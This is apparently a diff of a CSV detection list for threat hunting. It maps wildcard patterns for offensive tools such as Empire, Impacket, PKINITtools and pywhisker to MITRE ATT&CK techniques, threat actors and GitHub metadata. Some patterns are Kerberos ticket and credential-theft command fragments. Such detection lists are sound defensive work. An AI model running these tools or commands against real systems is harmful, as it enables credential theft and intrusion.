T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1082","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SQLInstanceDomain*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SQLInstanceDomain.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SQLInstanceDomain.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1082","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SqlServerLinkCrawl*","offensive_tool_keyword","AD exploitation cheat sheet","Automatically find all linked databases","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Get-SQLServerLoginDefaultPw*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLServerLoginDefaultPw.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-SQLServerLoginDefaultPw*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1097","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-SQLSysadminCheck*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLServerLoginDefaultPw.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SQLServerLoginDefaultPw*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLServerLoginDefaultPw.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SQLServerLoginDefaultPw*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1097","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SQLSysadminCheck*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLServerLoginDefaultPw.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*getST.py -k -no-pass -spn*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*GetSyscallStub.nim*","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" -"*Get-System.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-System.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-SystemDNSServer.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SystemDNSServer.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-SystemNamedPipe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-System.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-System.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SystemDNSServer.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SystemDNSServer.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SystemNamedPipe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*getTGT.py -dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*getTGT.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*getTGT.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*gettgtpkinit.py -cert-pfx *","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" "*gettgtpkinit.py -cert-pfx*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*gettgtpkinit.py -pfx-base64 *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*gettgtpkinit.py*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" "*Get-UnattendSensitiveData*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Get-USBKeystrokes*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 